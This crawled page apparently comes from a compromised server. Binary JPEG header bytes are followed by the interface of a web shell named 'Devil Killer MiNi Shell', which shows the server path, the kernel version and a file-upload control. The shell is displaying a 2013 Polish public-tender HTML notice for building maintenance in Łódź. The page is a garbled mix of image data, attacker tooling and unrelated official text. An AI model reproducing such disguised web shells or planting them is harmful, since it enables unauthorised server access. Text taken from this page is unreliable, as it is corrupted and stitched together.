JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130806/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130806/156285-N-2013.html

<p class="kh_header"><b>Łódź: Usługi konserwacji ogólnobudowlanej w administrowanych nieruchomościach</b><br>
<b>Numer ogłoszenia: 156285 - 2013; data zamieszczenia: 06.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Administracja Zasobów Komunalnych Łódź-Górna , ul. Lubelska 9/11, 93-129 Łódź, woj. łódzkie, tel. 42 684 52 19, faks 42 684 52 19.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi konserwacji ogólnobudowlanej w administrowanych nieruchomościach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem postępowania jest udzielenie zamówienia na świadczenie na rzecz Zamawiającego usługi w zakresie określonym w ust. 2 - 4.
2. Przedmiotem zamówienia są usługi konserwacji ogólnobudowlanej świadczone w ramach 
    pogotowia (wymagana 24 godzinna gotowość) w nieruchomościach administrowanych przez      
    Zamawiającego oraz w lokalach gminnych administrowanych przez Zamawiającego w budynkach 
    Wspólnot Mieszkaniowych w podziale na trzy części zwane rejonami  nr 1,  nr 2, nr 3 - zgodnie z 
    wykazami adresowymi nieruchomości objętych zamówieniem stanowiącymi załączniki do 
    niniejszej Specyfikacji Istotnych Warunków Zamówienia:
    a) część I (rejon nr 1) - załącznik nr 1,
    b) część II (rejon nr 2) - załącznik nr 1a,
    c) część III (rejon nr 3) - załącznik nr 1b.
3. Usługi świadczone będą w oparciu o zakresy czynności usług zwane formularzami cenowymi, 
    będące cennikami usług stanowiące załączniki do niniejszej Specyfikacji Istotnych Warunków 
    Zamówienia:
a)	część I (rejon nr 1) - załącznik nr 2, 
b)	część II (rejon nr 2) załącznik nr 2a, 
c)	część III (rejon nr 3) załącznik nr 2b, 
obejmujące w swoim zakresie następujące czynności:
  3.1. czyszczenie kieli i rynien z liści;
  3.2. sprzątanie i zamiatanie połaci dachowej (nie dot. okresu zimowego i usuwania śniegu)
  3.3. rozebranie rynien z blachy nie nadającej się do użytku;
  3.4. naprawa rynien bez zdejmowania przez sprawdzenie i polutowanie pęknięć;                        
  3.5. uzupełnienie rynien z blachy ocynkowanej wiszących w odcinkach o długości ponad 1mb i 
         średnicy 15 cm;
  3.6. uzupełnienie rynien za wykonanie koszy z blachy ocynkowanej;
  3.7. uzupełnienie rynien - wykonanie wpustów (sztucerów) z blachy ocynkowanej;
  3.8. wymiana haka rynnowego;
  3.9. sprawdzenie, wyprostowanie, polutowanie uszkodzeń rur spustowych, umocowanie     
         obruszonych uchwytów;
3.10. uzupełnienie kolanek lub załamań z blachy ocynkowanej;
3.11. uzupełnienie rynien z blachy ocynkowanej wiszących w odcinkach o długości ponad 1mb i 
         średnicy 12 cm;
   3.12. demontaż i ponowny montaż rur spustowych (nie wymienialnych);
   3.13. wymiana rury spustowej z blachy ocynkowanej na rury z PCV;
   3.14. wymiana uchwytów do rur spustowych;
3.15.  wymiana rury deszczowej z osadnikiem;
3.16. wymiana rury deszczowej z osadnikiem na PCV;
3.17. uzupełnienie obróbek blacharskich: murów ogniowych, koszów i okapów z blachy ocynkowanej;
   3.18. wymiana obróbek blacharskich; murów ogniowych, pasów nad i podrynnowych, wyskoków i 
            pasów elewacji, gzymsów, krawędzi balkonowych oraz listew dociskowych  z blachy 
            ocynkowanej;
3.19. montaż listew dociskowych z blachy ocynkowanej;
3.20. doszczelnienie silikonem listew dociskowych z blachy ocynkowanej;
3.21. rozbiórka pokrycia z papy na dachach drewnianych;
3.22. rozbiórka pokrycia z papy na dachach betonowych;
3.23. wykonanie i rozebranie prowizorycznego zabezpieczenia połaci dachowej;
3.24. drobne naprawy pokrycia papowego polegające na umocowaniu pokrycia i zakitowaniu;
3.25. uzupełnienie obróbek papą asfaltową: mury ogniowe, gzymsy okapy, kosze, kołnierze;
3.26. pokrycie papa asfaltowa na lepiku w nakładkę, na dachu dawniej krytych papą na zimno;
3.27. uzupełnienie pokryć z 1 warstwy papy asfaltowej na klapach kominiarskich;
3.28. drobne naprawy pokrycia wstawienie łat do 0,10 m2;
3.29. drobne naprawy pokrycia wstawienie łat do 1,00 m2;
3.30. posmarowanie powierzchni dachu lepikiem asfaltowym; 
3.31. posmarowanie powierzchni dachu abizolem D, z zakitowaniem uszkodzeń;
3.32. pokrycie dachów o pow. do 100 m2 papą zgrzewalną - naprawa pokrycia z papy
         termozgrzewalnej, przyklejenie łat z papy termozgrzewalnej wierzchniego krycia grub. 4,7 mm 
         wraz z przygotowaniem podłoża;
3.33. naprawa pokryć dachowych papą termozgrzewalną (obróbki z papy /kołnierze/ elem. metalowe, 
         występujące na dachu wraz z oczyszczeniem zaimpregnowaniem);
3.34. przemurowanie przewodów kominowych - wykucie otworów;
3.35. przemurowanie przewodów kominowych - odgruzowanie przewodów;
3.36. obsadzenie kratek wentylacyjnych w ścianach z cegieł;
3.37. wykucie z muru kratek wentylacyjnych, drzwiczek;
3.38. przemurowanie przewodów kominowych - zamurowanie otworów;
3.39. przemurowanie kominów o objęt. powyżej 0,5 m3;
3.40. przemurowanie kominów o objęt. do 0,5 m3;
3.41. wykucie bruzd pionowych 1* ? ceg. w ścianach z cegieł na zaprawie cementowo- 
         wapiennej;
3.42. zamurowanie bruzd pionowych lub pochyłych o przekroju ? *1 ceg. w ścianach z cegieł;
3.43. przemurowanie ciągłe pęknięć o głębokości ? cegły przy użyciu zaprawy cementowej w 
         ścianach na zaprawie cem - wapiennej;
3.44. uzupełnienie ścianek z cegieł grubości ? cegły w ścianach z cegieł na zaprawie cem - 
         wapiennej;
3.45. uzupełnienie ścian lub zamurowanie otworów w ścianach na zaprawie cem - wap. cegłami;
3.46. przemurowanie ścianek z cegieł o grubości ? cegły na zaprawie cem - wapiennej do ościeży lub    
         powierzchni ścian;
3.47. przemurowanie ścianek z cegieł o grubości 1cegły na zaprawie cem - wapiennej do ościeży lub    
         powierzchni ścian;
3.48. naprawienie uszkodzonych w murze cegieł w ilości 5 szt.;
3.49. naprawienie uszkodzonych w murze powierzchni do 0,50 m2;
3.50. obsadzenie ościeżnic stalowych w ścianach z cegieł wraz z zakupem ościeżnicy;
3.51. obsadzenie ościeżnic drewnianych w ścianach wewnętrznych z cegieł;
3.52. obsadzenie ościeżnic drewnianych w ścianach zewnętrznych  z cegieł;
3.53. przebicie otworów w ścianach z cegieł o grubości 2 cegieł na zaprawie cementowo-wapiennej 
         dla osadzenia nawiewników podokiennych;
3.54. przebicie otworów w ścianach z cegieł o grubości 2 ? cegły na zaprawie cementowo-wapiennej 
         dla osadzenia nawiewników podokiennych;
3.55. nawietrzaki podokienne typ A o wielkości (grub. muru w cegłach) do 2,0;
3.56. nawietrzaki podokienne typ A o wielkości (grub. muru w cegłach) do 2,5;
3.57. ścianki działowe z płyt KGS woda-ogień na rusztach metalowych pojedyńczych z pokryciem 
         obustronnym jednowarstwowo;
3.58. okładziny stropów z płyt KGS woda-ogień na rusztach metalowych pojedyńczych;
3.59. okładziny z płyt KGS (suche tynki) pojedyńcze na ścianach na paskach;
3.60. obudowa ścian, słupów z płyt KGS na rusztach metalowych pojedyńczych jednowarstwowo;
3.61. odbicie tynków z zaprawy wapiennej lub cem.- wapiennej na ścianach, filarach, pilastrach;   
3.62. odbicie tynków z zaprawy wapiennej lub cem.- wapiennej na stropach płaskich, belkach i 
         schodach;
3.63. uzupełnienie tynków zwykłych wewnętrznych kat. III o pow. do 5 m2 z zaprawy cement.- 
         wapiennej na ścianach ceramicznych, betonowych, z płyt wiórowo - cement. zagrunt. siatką;
3.64. uzupełnienie tynków zwykłych wewnętrznych kat. III o pow. do 5 m2 z zaprawy cement. -
         wapiennej na stropach ceramicznych, betonowych, podciągach, belkach, biegach schodowych, 
         płytach wiórowo- cementowych;
3.65. uzupełnienie tynków zewnętrznych  kat. III z zaprawy cem.- wapiennej o powierzchni do 5 m2;
3.66. uzupełnienie tynków zwykłych wewnętrznych kat. III o pow do 0,5 m2 z zaprawy cem. -      
         wapiennej na podłożach otrzcinowanych lub z dranicami na ścianach;
3.67. uzupełnienie tynków zwykłych wewnętrznych kat. III o pow do 0,5 m2 z zaprawy cem. -      
         wapiennej na podłożach otrzcinowanych lub z dranicami na stropach;
3.68. uzupełnienie tynków zwykłych wewnętrznych kat. III o pow do 0,5 m2 z zaprawy cem. -      
         wapiennej na podłożach z cegły, pustaków ceramicznych, betonu na ścianach;
3.69. uzupełnienie tynków zwykłych wewnętrznych kat. III o pow do 0,5 m2 z zaprawy cem. -      
         wapiennej na podłożach z cegły, pustaków ceramicznych, betonu na stropach;
3.70. uzupełnienie tynków na kominach ponad dachem;
3.71. przecieranie tynków na kominach ponad dachem;
3.72. wykonanie tynków zwykłych na kominach ponad dachem;
3.73. wykonanie tynków wewnętrznych z zaprawy cem - wapiennej na ościeżach do 25 cm;
3.74. przyklejenie warstwy siatki na ścianach lub stropach;
3.75. rozebranie obicia ścian z płyt - paneli, demontaż kasetonów - boazerii, oraz ścianek działowych 
         i skrzydeł drzwiowych;
3.76. wzmocnienie krokwi przez nabicie dwustronne desek grub. 32 mm.;
3.77. wymiana deskowania dachu z desek o grub. 25 mm. na styk;
3.78. wymiana elementów konstrukcyjnych dachu - krokwie, kleszcze, murłaty, płatwie, podwaliny, 
         słupki, zastrzały;
3.79. wymiana jednostronnego odeskowania ścian z desek niestruganych o grub. 25 mm.;
3.80. podstemplowanie zagrożonych stropów pojedynczymi stemplami;
3.81. podstemplowanie zagrożonych stropów z deskowaniem;
3.82. podstemplowanie zagrożonych nadproży;
3.83. uzupełnienie wyłazów kominiarskich;
3.84. wymiana elementów schodów drewnianych - poręczy;
3.85. wymiana elementów schodów drewnianych - podstopnic;
3.86. wymiana elementów schodów drewnianych - stopnic;
3.87. wymiana elementów schodów drewnianych - słupków;
3.88. wymiana elementów schodów drewnianych - tralek;
3.89. przybicie do podłóg, zabicie otworów drzwiowych i okiennych  płytami  pilśniowymi;
3.90. przybicie do podłóg, zabicie otworów drzwiowych i okiennych  płytami OSB grub. 20 mm.;
3.91. obicie blachą ocynkowaną drewnianych powierzchni: okiennic, drzwi, okien, podłóg;
3.92. dopasowanie skrzydeł drzwiowych wewnętrznych, zewnętrznych i balkonowych  jako oddzielna 
         praca - nie dotyczy robót związanych z wymianą okuć oraz elementów stolarki;
3.93. dopasowanie skrzydeł okiennych o pow. 0,5 do 2,5 m2 jako oddzielna praca - nie dotyczy robót 
         związanych z wymianą okuć oraz elementów stolarki;
3.94. wymiana ramiaków skrzydeł okiennych wraz z dopasowaniem stolarki;
3.95. wymiana listew przymykowych skrzydeł okiennych wraz z dopasowaniem stolarki;
3.96. wymiana okapników skrzydeł okiennych wraz z dopasowaniem stolarki;
3.97. wymiana zasuw drzwiowych wraz z dopasowaniem i regulacją skrzydeł;
3.98. wymiana zamków wpuszczanych wraz z dopasowaniem i regulacją skrzydeł;
3.99. wymiana zawiasów drzwiowych wraz z dopasowaniem i regulacją skrzydeł;
3.100. wymiana zawiasów - montaż skobla wraz z kłódką;
3.101. awaryjne otwarcie lokalu;
3.102. awaryjne otwarcie lokalu, stolarka nietypowa drzwi antywłamaniowe;
3.103. wymiana oklejenia skrzydeł drzwiowych płytami pilśniowymi o pow.  ponad 1,0m2;
3.104. rozszklenie otworów okiennych lub drzwiowych o ramach drewnianych;
3.105. rozszklenie otworów okiennych lub drzwiowych o ramach metalowych;
3.106. szklenie ram drewn. zdejmowanych - pojedynczych na kit podwójny szkłem płaskim ciągn. 
           2-3 mm  o pow. szyby ponad 0,5 m2;
3.107. szklenie ram metalowych stałych, szkłem gładkim 5 - 8 mm. na uszczelki i listwy o pow. szyby 
           do 4,0 m2;
3.108. uzupełnienie okitowania istniejących szyb o pow. ponad 0,5 m2 w ramach drewnianych;
3.109. wymiana desek podłogowych w ilosci do 2 m2 w jednym miejscu;
3.110. uzupełnienie posadzki cementowej o pow. 1,00-5,00 m2 w jednym miejscu z zatarciem na 
           ostro;
3.111. rozebranie chodników, wysepek przystankowych, przejść dla pieszych z płyt betonowych 
           50×50×7 cm na podsypce piaskowej;
3.112. wykonanie opaski z płyt betonowych 50x50x7 cm na podsypce cem - piaskowej z 
           wypełnieniem spoin zaprawą cementową przy budynku;
3.113. wykonanie opaski betonowej o szer. 50 cm, na podłożu gruntowym przy budynku;
3.114. wykonanie wraz z montażem ścieku z prefabrykatów betonowych o grub. 15 cm na podsypce 
           cem - piaskowej;
3.115. wymiana lub uzupełnienie krat;
3.116. wymiana, lub uzupełnienie balustrad schodowych lub balkonowych prostych;
3.117. spawanie prętów okrągłych do kształtowników lub płaskowników;
3.118. wymiana lub uzupełnienie ogrodzenia z siatki w ramach na słupkach;
3.119. dwukrotne malowanie farbą olejną:  krat, balustrad, bram i furtek z prętów;
3.120. dwukrotne malowanie tynków zewnętrznych farba emulsyjną;
3.121. dwukrotne malowanie tynków wewnętrznych farbą emulsyjną ścian i sufitów;
3.122. dwukrotne malowanie farbą olejną uprzednio malowanej stolarki drzwiowej, ścianek i szafek;
3.123. dwukotne malowanie farbami wapiennymi starych tynków wewnętrznych - sufitów; 
3.124. dwukotne malowanie farbami wapiennymi starych tynków wewnętrznych ścian - zamalowanie 
            napisów; 
   3.125. montaż tablic informacyjnych, nr policyjnych lub innych drobnych elementów, 
           (materiały - tablice do montażu dostarcza Zamawiający);
   3.126. montaż pojedyńczych uchwytów do flag;
   3.127. montaż podwójnych uchwytów do flag;
   3.128. wymiana skrzynki na listy 1-modułowej; 
   3.129. wymiana zamka w skrzynce na listy;
   3.130. demontaż rurociągu żeliwnego pionowego na ścianie budynku;
3.131. rozebranie pieców i trzonów kuchennych oblicowanych kaflami;
3.132. demontaż pieców lub kuchni przenosnych;
3.133. montaż pieców lub kuchni przenośnych zakupionych przez zamawiającego; 
           Uwaga: w cenie pozycji należy ująć transport ze sklepu do miejsca montażu oraz cenę rur 
            podłączeniowych  i blachy przedpiecowej.
   3.134. wykonanie zastaw zabezpieczających na dachu;
   3.135. wykonanie poziomych pomostów na dachu;
   3.136. wykonanie rusztowania przy kominach;
   3.137. rusztowania zewnętrzne, drewniane drabinowe, punktowe;
3.138. wygrodzenie strefy niebezpiecznej wraz z oznakowaniem, słupki ograniczające ustawienie i 
              rozebranie;
   3.139. podstawienie drabiny;
   3.140. wywiezienie gruzu na odległość do 16 km;

4. Zamawiający w przedmiocie zamówienia będzie wymagał od Wykonawcy:
   a)  we wszystkie dni tygodnia 24 godzinnej gotowości do wykonywania czynności objętych 
        zamówieniem na podstawie pisemnych zleceń administratorów oraz telefonicznych zgłoszeń 
        służb miejskich, bądź Zamawiającego;
   b)  przystąpienia do wykonywania czynności usługi na podstawie otrzymanych zleceń i 
        telefonicznych zgłoszeń:
      - nie później niż w ciągu trzech godzin od momentu przyjęcia zgłoszenia awarii zagrażającej 
         życiu, zdrowiu lub mieniu najemców Gminy Łódź; 
       - nie później niż w ciągu  25 dni od daty otrzymanego zlecenia pozostałe awarie;
   c)  gwarancji na okres min. 6 m-cy, na usługi polegające na wykonaniu pokrycia połaci dachowej 
        w jednym miejscu o powierzchni powyżej 30,00 m2; 
   d)  stosowania materiałów budowlanych posiadających atest i deklarację zgodności z obecnie 
        obowiązującymi normami i aprobatami technicznymi;
   e)  przestrzegania przepisów bezpieczeństwa i higieny pracy - zgodnie z zasadami bezpieczeństwa i 
        higieny pracy określonymi w Rozporządzeniu Ministra Infrastruktury z dnia 06.02. 2003 r. 
        w sprawie Bezpieczeństwa i higieny pracy podczas wykonywania robót  budowlanych 
 
       (Dz. U. Nr 47 poz. 401);
  f)  odpowiedzialności za całość szkód powstałych na skutek prowadzonych usług;
  g)  zachowania praw osób trzecich;
  h)  sporządzania zestawień rozliczeniowych z otrzymanych zarejestrowanych zleceń za wykonane 
       czynności usługowe na podstawie faktycznie wykonanych czynności (ilości jednostek 
       miary) i  cen jednostkowych (netto) w oparciu o cennik ryczałtowy cen jednostkowych (netto) - 
       dwa razy w miesiącu,  odrębnie,  dla  każdego zlecenia; 
       Zestawienie obejmujące: nr zlecenia,  adres nieruchomości, wykaz wykonanych czynności wraz z 
       wbudowanym materiałem na nieruchomości, cenę jednostkową (netto) z cennika ryczałtowego 
       oraz wartość iloczynową zleconej usługi, potwierdzone przez właściwego miejscowo  
       administratora nieruchomości (MAN-a),  stanowić będzie załącznik do wystawionych przez 
       Wykonawcę faktur,  odrębnie  dla każdej nieruchomości prywatnej lub współwłasnej oraz 
       łącznie dla nieruchomości gminnych i skarbu państwa; 
       W przypadku wykonania czynności usługowych  nie objetych cennikiem ryczałtowym, 
       rozliczenie usługi nastąpi na podstawie kosztorysu powykonawczego sporządzonego w oparciu o 
       KNR-y  z zastosowaniem cen materiałów i pracy sprzętu, nie wyższych od opublikowanych w 
       Biuletynie Sekocenbudu i składników cenotwórczych określonych w formularzu ofertowym 
       oferty..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.76.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W celu potwierdzenia spełnienia warunku udziału w postępowaniu, o których  mowa 
     w art. 22 ust. 1 Ustawy, który dotyczy:
a)  posiadania wiedzy i doświadczenia,
    Zamawiający żąda od Wykonawcy udokumentowania wiedzy i doświadczenia poprzez wykazanie
    w zał. nr 4 do SIWZ wykonanych usług lub usług w trakcie realizacji w okresie ostatnich
    trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym 
     okresie, odpowiadających swoim rodzajem usługom stanowiącym przedmiot zamówienia lub 
     podobnym  z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, w ilości: 
     co najmniej jednej usługi w okresie 12 m-cy dla każdej wybranej części postępowania 
     (rejonu)  na kwotę:  minimum  100 000,00 zł  brutto oraz załączeniem dokumentów 
     potwierdzających, że wykazane przez Wykonawcę usługi zostały wykonane lub są wykonywane 
     należycie.
     Dla usług będących w trakcie realizacji należy załączyć kserokopie podpisanej umowy z 
     informacją potwierdzającą, że usługi są wykonywane należycie. Kwota podpisanej umowy nie    
     może być niższa niż kwota określona powyżej.   
     Ocena spełnienia opisanego warunku nastąpi na podstawie przedstawionych przez
     Wykonawców dokumentów i oświadczeń, na zasadzie: (spełnia/ nie spełnia).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W celu potwierdzenia spełnienia warunku udziału w postępowaniu, o którym mowa  
     w art. 22 ust. 1 Ustawy, który dotyczy:
 a) dysponowania osobami zdolnymi do wykonania zamówienia,
     Zamawiający żąda od Wykonawcy oświadczenia  - zał. nr 5 do SIWZ, że Wykonawca lub osoba 
     uczestnicząca w wykonywaniu zamówienia pełniąca na rzecz Wykonawcy obowiązki kierownika 
     robót - usługi nadzoru nad prowadzonymi robotami posiada: 
     - uprawnienia budowlane w specjalności konstrukcyjno - budowlanej (wykonawcze), zgodne z art. 
     12, 13  i 14 ustawy z dnia 07.07.1994 r. Prawo Budowlane z późniejszymi zmianami,  
     - aktualne zaświadczenie o przynależności do Okręgowej Izby Inżynierów Budownictwa  wraz z  
     załączeniem tych dokumentów.
     Ocena spełnienia opisanego warunku nastąpi na podstawie przedstawionych przez 
     Wykonawców dokumentów i oświadczeń, na zasadzie: (spełnia/ nie spełnia).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W celu potwierdzenia spełnienia warunku udziału w postępowaniu, o którym mowa 
     w art. 22 ust.1 Ustawy, który dotyczy:
 a) sytuacji ekonomicznej i finansowej,
     Zamawiający żąda od Wykonawcy,  posiadania ubezpieczenia od odpowiedzialności 
     cywilnej w zakresie prowadzonej działalności na sumę ubezpieczenia nie mniej niż  50 000,00 zł. 
     Ocena spełnienia opisanego warunku nastąpi na podstawie przedstawionych przez 
     Wykonawców dokumentów i oświadczeń, na zasadzie: (spełnia/ nie spełnia).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

